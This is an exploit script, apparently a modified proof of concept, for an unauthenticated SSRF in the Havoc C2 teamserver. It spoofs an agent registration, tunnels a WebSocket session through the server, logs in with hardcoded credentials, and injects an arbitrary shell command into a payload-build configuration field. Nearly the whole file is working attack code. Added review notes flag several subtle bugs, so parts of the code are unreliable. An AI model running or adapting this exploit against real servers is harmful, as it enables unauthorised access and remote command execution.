# Exploit Title: Havoc C2 0.7 Unauthenticated SSRF
# Date: 2024-07-13
# Exploit Author: @_chebuya
# Software Link: https://github.com/HavocFramework/Havoc
# Version: v0.7
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2024-41570
# Description: This exploit works by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.
# Github: https://github.com/chebuya/Havoc-C2-SSRF-poc
# Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/
#########################
### Updated by: WoyAg ###
#########################
from base64 import b64encode
from Crypto.Cipher import AES
from Crypto.Util import Counter
from hashlib import sha3_256
import argparse
import json
import random
import requests
# Silence urllib3 warnings; every request in this file is sent with
# verify=False, which would otherwise emit a warning per call.
requests.packages.urllib3.disable_warnings()
# Required AES key length in bytes. encrypt() and decrypt() pad shorter keys
# up to this size and assert on it.
key_bytes = 32
def decrypt(key, iv, ciphertext):
    """Decrypt ``ciphertext`` with AES in CTR mode and return the plaintext.

    A key shorter than ``key_bytes`` is right-padded with ASCII ``"0"`` bytes
    up to ``key_bytes``; a longer key fails the length assertion. ``iv`` is
    read as a big-endian integer (via its hex form) and used as the initial
    value of a counter that is ``AES.block_size * 8`` bits wide.
    """
    # ljust leaves an already-long key untouched, so the assertion below still
    # rejects oversized keys exactly as the manual padding loop did.
    padded_key = key.ljust(key_bytes, b"0")
    assert len(padded_key) == key_bytes
    start_value = int(iv.hex(), 16)
    counter = Counter.new(AES.block_size * 8, initial_value=start_value)
    return AES.new(padded_key, AES.MODE_CTR, counter=counter).decrypt(ciphertext)
def int_to_bytes(value, length=4, byteorder="big"):
    """Serialize the integer ``value`` into exactly ``length`` bytes.

    ``byteorder`` is passed straight to ``int.to_bytes`` (``"big"`` by
    default). Values that do not fit in ``length`` unsigned bytes raise
    ``OverflowError``.
    """
    packed = value.to_bytes(length=length, byteorder=byteorder)
    return packed
def encrypt(key, iv, plaintext):
    """Encrypt ``plaintext`` with AES in CTR mode and return the ciphertext.

    Keys shorter than ``key_bytes`` are right-padded with ASCII ``"0"`` bytes;
    keys longer than ``key_bytes`` trip the length assertion. The counter is
    ``AES.block_size * 8`` bits wide and starts at ``iv`` interpreted as a
    big-endian integer.
    """
    key = key.ljust(key_bytes, b"0")
    assert len(key) == key_bytes
    ctr = Counter.new(AES.block_size * 8, initial_value=int(iv.hex(), 16))
    cipher = AES.new(key, AES.MODE_CTR, counter=ctr)
    return cipher.encrypt(plaintext)
def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
    """POST a registration packet for the spoofed agent to the listener URL.

    All arguments are ``bytes``. The packet body is sent unencrypted and is
    the concatenation, in order, of: command ``0x63``, request id ``1``, the
    module-level ``AES_Key`` and ``AES_IV``, ``agent_id``, four 4-byte
    length-prefixed strings (hostname, username, domain name, internal IP),
    the process name with its length field, ``process_id`` and 100 bytes of
    ``0xAB`` filler. The body is preceded by a header made of the 4-byte total
    size, ``magic`` and ``agent_id``. The outcome is printed; nothing is
    returned.
    """
    body = b"".join([
        b"\x00\x00\x00\x63",  # command
        b"\x00\x00\x00\x01",  # request id
        AES_Key,
        AES_IV,
        agent_id,  # demon id
        int_to_bytes(len(hostname)), hostname,
        int_to_bytes(len(username)), username,
        int_to_bytes(len(domain_name)), domain_name,
        int_to_bytes(len(internal_ip)), internal_ip,
        # NOTE(review): the advertised length is deliberately 6 less than the
        # real byte length, as in the original code - reason not visible here.
        int_to_bytes(len(process_name) - 6), process_name,
        process_id,
        b"\xab" * 100,  # trailing filler
    ])
    # The size field counts the body plus 12 (the original's constant).
    packet = int_to_bytes(12 + len(body)) + magic + agent_id + body

    print("[***] Trying to register agent...")
    response = requests.post(teamserver_listener_url, data=packet, headers=headers, verify=False)
    if response.status_code == 200:
        print("[***] Success!")
        return
    print(f"[!!!] Failed to register agent - {response.status_code} {response.text}")
def open_socket(socket_id, target_address, target_port):
    """Send the packet asking the teamserver to open a socket to a target.

    ``socket_id`` is a 4-byte identifier, ``target_address`` a dotted IPv4
    string and ``target_port`` an integer. The inner package (subcommand
    ``0x10``, socket id, fixed local address/port bytes, the target address
    and the 4-byte port) is length-prefixed, encrypted with the module-level
    ``AES_Key``/``AES_IV`` and sent after command ``0x09ec`` and request id
    ``2``. The outcome is printed; nothing is returned.
    """
    # The dotted-quad octets are emitted last-to-first, one byte each.
    reversed_octets = b"".join(
        int_to_bytes(int(part), length=1)
        for part in reversed(target_address.split("."))
    )
    inner = b"".join((
        b"\x00\x00\x00\x10",  # subcommand
        socket_id,
        b"\x22\x22\x22\x22",  # local address bytes (fixed)
        b"\x33\x33\x33\x33",  # local port bytes (fixed)
        reversed_octets,
        int_to_bytes(target_port),
    ))
    # The length prefix covers the package plus its own 4 bytes.
    sealed = encrypt(AES_Key, AES_IV, int_to_bytes(len(inner) + 4) + inner)
    body = b"\x00\x00\x09\xec" + b"\x00\x00\x00\x02" + sealed  # command + request id
    packet = int_to_bytes(12 + len(body)) + magic + agent_id + body

    print("[***] Trying to open socket on the teamserver...")
    response = requests.post(teamserver_listener_url, data=packet, headers=headers, verify=False)
    if response.status_code == 200:
        print("[***] Success!")
        return
    print(f"[!!!] Failed to open socket on teamserver - {response.status_code} {response.text}")
def write_socket(socket_id, data):
    """Send ``data`` (bytes) as a socket-write packet for ``socket_id``.

    The inner package is subcommand ``0x11``, the socket id, socket type
    ``3``, a success flag of ``1`` and the 4-byte length-prefixed ``data``.
    It is length-prefixed, encrypted with the module-level
    ``AES_Key``/``AES_IV`` and sent after command ``0x09ec`` and request id
    ``8``. The outcome is printed; nothing is returned.
    """
    inner = b"".join((
        b"\x00\x00\x00\x11",  # subcommand
        socket_id,
        b"\x00\x00\x00\x03",  # socket type
        b"\x00\x00\x00\x01",  # success flag
        int_to_bytes(len(data)),
        data,
    ))
    # The length prefix covers the package plus its own 4 bytes.
    sealed = encrypt(AES_Key, AES_IV, int_to_bytes(len(inner) + 4) + inner)
    body = b"\x00\x00\x09\xec" + b"\x00\x00\x00\x08" + sealed  # command + request id
    packet = int_to_bytes(12 + len(body)) + magic + agent_id + body

    print("[***] Trying to write to the socket")
    response = requests.post(teamserver_listener_url, data=packet, headers=headers, verify=False)
    if response.status_code == 200:
        print("[***] Success!")
        return
    print(f"[!!!] Failed to write data to the socket - {response.status_code} {response.text}")
def read_socket(socket_id):
    """Poll the listener and return the decrypted socket output.

    Sends an unencrypted packet holding command ``1`` and request id ``9``.
    ``socket_id`` is accepted for symmetry with the other helpers but is not
    part of the request. On HTTP 200 the response body after its first 12
    bytes is decrypted with the module-level ``AES_Key``/``AES_IV`` and the
    plaintext after its own first 12 bytes is returned as ``bytes``. On any
    other status the failure is printed and the empty ``str`` ``""`` is
    returned.
    """
    body = b"\x00\x00\x00\x01" + b"\x00\x00\x00\x09"  # command + request id
    packet = int_to_bytes(12 + len(body)) + magic + agent_id + body

    print("[***] Trying to poll teamserver for socket output...")
    response = requests.post(teamserver_listener_url, data=packet, headers=headers, verify=False)
    if response.status_code != 200:
        print(f"[!!!] Failed to read socket output - {response.status_code} {response.text}")
        return ""
    print("[***] Read socket output successfully!")

    # The first 12 bytes of the response are three 4-byte header fields
    # (command id, request id, package size); everything after is ciphertext.
    plaintext = decrypt(AES_Key, AES_IV, response.content[12:])
    return plaintext[12:]
# --- Command-line interface ---------------------------------------------
# Everything below runs at module import time: parsing arguments, building
# the spoofed agent's identity and sending the first two requests.
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
# The port is parsed as a string; it is converted with int() where it is used.
parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")
parser.add_argument("-c", "--cmd", help="Command to run", default="sleep 5")
args = parser.parse_args()
# --- Module-level state read by the request helpers ----------------------
# 4-byte marker placed in every packet header, right after the size field.
magic = b"\xde\xad\xbe\xef"
teamserver_listener_url = args.target
headers = { "User-Agent": args.user_agent }
# Random agent id, serialized as 4 big-endian bytes.
agent_id = int_to_bytes(random.randint(100000, 1000000))
# All-zero key and IV: sent in the registration packet and then used by
# encrypt()/decrypt() for every later packet.
AES_Key = b"\x00" * 32
AES_IV = b"\x00" * 16
# Identity fields of the spoofed agent. Everything is UTF-8 except the
# process name, which is encoded as UTF-16LE.
hostname = bytes(args.hostname, encoding="utf-8")
username = bytes(args.username, encoding="utf-8")
domain_name = bytes(args.domain_name, encoding="utf-8")
internal_ip = bytes(args.internal_ip, encoding="utf-8")
process_name = args.process_name.encode("utf-16le")
process_id = int_to_bytes(random.randint(1000, 5000))
# Step 1: register the spoofed agent with the listener.
register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)
# Step 2: ask for a socket to --ip/--port under a fixed 4-byte socket id.
socket_id = b"\x11\x11\x11\x11"
open_socket(socket_id, args.ip, int(args.port))
############################################################################################################
########################### CUSTOM ###########################
############################################################################################################
def create_websocket_frame(payload, opcode=1, fin=True, mask=True):
    """Build a single raw WebSocket frame as laid out in RFC 6455, section 5.2.

    Args:
        payload (bytes | bytearray | memoryview | str): Data to carry in the
            frame. ``str`` is encoded with the default codec (UTF-8).
        opcode (int, optional): Frame type; only the low 4 bits are used.
            Defaults to 1 (text frame).
        fin (bool, optional): Whether to set the FIN bit, marking this as the
            final fragment. Defaults to True.
        mask (bool, optional): Whether to mask the payload with a random
            4-byte key. Defaults to True (required for client-to-server
            frames).

    Returns:
        bytes: Header, optional extended length, optional masking key and the
        (possibly masked) payload, concatenated.
    """
    # Local import: the masking key comes from the OS entropy source. The
    # `random` module exposes no `urandom`, so the previous call raised
    # AttributeError for every masked frame.
    import os

    if isinstance(payload, (bytearray, memoryview)):
        payload = bytes(payload)
    elif not isinstance(payload, bytes):
        payload = payload.encode()

    # First byte: FIN (bit 7) and opcode (bits 3-0).
    first_byte = (0x80 if fin else 0x00) | (opcode & 0x0F)

    # Length encoding: 0-125 is stored inline; 126 announces a 16-bit
    # extended length; 127 announces a 64-bit extended length. The largest
    # range must be tested explicitly so that payloads over 65535 bytes get
    # marker 127 rather than 126.
    payload_length = len(payload)
    if payload_length <= 125:
        length_marker = payload_length
        extended_length = b""
    elif payload_length <= 0xFFFF:
        length_marker = 126
        extended_length = payload_length.to_bytes(2, "big")
    else:
        length_marker = 127
        extended_length = payload_length.to_bytes(8, "big")

    # Second byte: MASK (bit 7) and the 7-bit length marker.
    second_byte = (0x80 if mask else 0x00) | length_marker

    if mask:
        mask_key = os.urandom(4)
        # Each payload byte is XORed with the key byte at (index mod 4).
        body = bytes(byte ^ mask_key[i % 4] for i, byte in enumerate(payload))
    else:
        mask_key = b""
        body = payload

    return bytes([first_byte, second_byte]) + extended_length + mask_key + body
def write_and_read_socket(socket_id, request_data):
    """Write ``request_data`` to the socket, then poll once and print the reply.

    Args:
        socket_id (bytes): Identifier of the previously opened socket.
        request_data (bytes): Raw bytes to write to the socket.

    The reply is printed as text; nothing is returned.
    """
    write_socket(socket_id, request_data)
    response = read_socket(socket_id)
    # read_socket() returns the str "" when the poll fails, and str has no
    # .decode(); only decode when bytes actually came back.
    if isinstance(response, (bytes, bytearray)):
        # Replies may contain non-UTF-8 bytes (e.g. binary frame headers);
        # substitute them rather than abort on UnicodeDecodeError.
        response = response.decode(errors="replace")
    print(response)
# User name and password placed in the authentication message built further
# down in this file.
USER = "ilya"
PASSWORD = "CobaltStr1keSuckz!"
# NOTE(review): host and port are assigned but not referenced anywhere in the
# visible code; the Host header below is built from args.ip / args.port.
host = "127.0.0.1"
port = 40056
# Random 16-byte nonce, base64-encoded, for the Sec-WebSocket-Key header.
websocket_key = b64encode(random.randbytes(16)).decode()
# WebSocket upgrade request written through the opened socket.
# NOTE(review): the literal uses bare LF line endings and ends right after the
# Connection header. An HTTP/1.1 header block is terminated by an empty line
# (CRLF CRLF) - confirm a trailing blank line was not lost when this file was
# reformatted.
init_connection = f'''GET /havoc/ HTTP/1.1
Host: {args.ip}:{args.port}
Upgrade: websocket
Sec-WebSocket-Key: {websocket_key}
Sec-WebSocket-Version: 13
Connection: Upgrade
'''
print(init_connection)
write_and_read_socket(socket_id, init_connection.encode())
# Authentication message: the password is sent as the hex SHA3-256 digest of
# PASSWORD, together with USER. Event/SubEvent ids and the "Time" value are
# fixed literals.
auth_to_teamserver = {
"Body": {
"Info": {
"Password": sha3_256(PASSWORD.encode()).hexdigest(),
"User": USER
},
"SubEvent": 3
},
"Head": {
"Event": 1,
"OneTime": "",
"Time": "18:40:17",
"User": USER
}
}
# Serialize to JSON, echo it, and send it as one masked WebSocket text frame
# (the defaults of create_websocket_frame).
auth_to_teamserver = json.dumps(auth_to_teamserver)
print(auth_to_teamserver)
write_and_read_socket(socket_id, create_websocket_frame(auth_to_teamserver))
# NOTE(review): `payload` is assigned here but never read; the message that is
# actually sent is `create_listener` below. It looks like a one-line template
# of the same request and could probably be removed.
payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": USER}}
# Request describing an HTTPS listener named "letmein" bound to 0.0.0.0:443.
# The later build request refers to this listener by the same name.
# NOTE(review): "Head" -> "User" below is the literal string "USER", whereas
# the one-line template above and the other messages in this file use the USER
# variable - confirm which is intended.
create_listener = {
"Body": {
"Info": {
"Headers": "",
"HostBind": "0.0.0.0",
"HostHeader": "",
"HostRotation": "round-robin",
"Hosts": "0.0.0.0",
"Name": "letmein",
"PortBind": "443",
"PortConn": "443",
"Protocol": "Https",
"Proxy Enabled": "false",
"Secure": "true",
"Status": "online",
"Uris": "",
"UserAgent": "LetMeIn"
},
"SubEvent": 1
},
"Head": {
"Event": 2,
"OneTime": "",
"Time": "08:39:18",
"User": "USER"
}
}
# Serialize to JSON, echo it, and send it as one masked WebSocket text frame.
create_listener = json.dumps(create_listener)
print(create_listener)
write_and_read_socket(socket_id, create_websocket_frame(create_listener))
# NOTE(review): `payload` is assigned again here and never read; it appears to
# be a one-line template of the build request assembled below, with
# "XinjectionX" / "XUSERX" as stand-ins for the substituted values.
payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{\n \"Amsi/Etw Patch\": \"None\",\n \"Indirect Syscall\": false,\n \"Injection\": {\n \"Alloc\": \"Native/Syscall\",\n \"Execute\": \"Native/Syscall\",\n \"Spawn32\": \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n \"Spawn64\": \"C:\\\\Windows\\\\System32\\\\notepad.exe\"\n },\n \"Jitter\": \"0\",\n \"Proxy Loading\": \"None (LdrLoadDll)\",\n \"Service Name\":\"XinjectionX\",\n \"Sleep\": \"2\",\n \"Sleep Jmp Gadget\": \"None\",\n \"Sleep Technique\": \"WaitForSingleObjectEx\",\n \"Stack Duplication\": false\n}\n", "Format": "Windows Service Exe", "Listener": "letmein"}, "SubEvent": 2}, "Head": { "Event": 5, "OneTime": "true", "Time": "18:39:04", "User": "XUSERX"}}
############################################################################################################
# Value substituted into the "Service Name" field of the build config: a fixed
# prefix, the user-supplied --cmd string, and a fixed suffix.
injection = """ \\\\\\\" -mbla; """ + args.cmd + """ 1>&2 && false #"""
# JSON text of the build configuration; `%s` is replaced with `injection` and
# the surrounding whitespace is stripped.
# NOTE(review): in this non-raw literal `\\notepad` yields a single backslash
# followed by "n", which a JSON parser reads as a newline escape, unlike the
# `\\\\notepad` form in the one-line template above - confirm which is
# intended.
injection_config = ('''
{
"Amsi/Etw Patch": "None",
"Indirect Syscall": false,
"Injection": {
"Alloc": "Native/Syscall",
"Execute": "Native/Syscall",
"Spawn32": "C:\\\\Windows\\\\SysWOW64\\notepad.exe",
"Spawn64": "C:\\\\Windows\\\\System32\\notepad.exe"
},
"Jitter": "0",
"Proxy Loading": "None (LdrLoadDll)",
"Service Name":"%s",
"Sleep": "2",
"Sleep Jmp Gadget": "None",
"Sleep Technique": "WaitForSingleObjectEx",
"Stack Duplication": false
}
''' % injection).strip()
# Build request that carries the config above as a string and names the
# "letmein" listener.
injection_request = {
"Body": {
"Info": {
"AgentType": "Demon",
"Arch": "x64",
"Config": injection_config,
"Format": "Windows Service Exe",
"Listener": "letmein"
},
"SubEvent": 2
},
"Head": {
"Event": 5,
"OneTime": "true",
"Time": "18:39:04",
"User": USER
}
}
# Serialize to JSON, echo it, and send it as one masked WebSocket text frame.
injection_request = json.dumps(injection_request)
print(injection_request)
write_and_read_socket(socket_id, create_websocket_frame(injection_request))